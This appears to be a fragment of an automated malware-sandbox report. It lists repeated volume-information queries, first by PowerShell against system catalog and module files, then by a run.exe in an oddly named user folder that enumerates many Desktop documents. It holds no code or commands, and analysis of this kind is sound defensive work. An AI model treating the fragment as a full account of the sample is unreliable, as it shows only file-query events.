      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Contacts VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\em_webdev_assignment_dec2024.doc VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\KZWFNRXYKI.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\KZWFNRXYKI.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\WUTJSCBCFX.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU\WUTJSCBCFX.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\KZWFNRXYKI.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\KZWFNRXYKI.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\UOOJJOZIRH.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\WKXEWIOTXI.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN\WKXEWIOTXI.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UOOJJOZIRH VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\UOOJJOZIRH.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\FENIVHOIKN.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\FENIVHOIKN.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\WKXEWIOTXI.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\WKXEWIOTXI.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG VolumeInformation
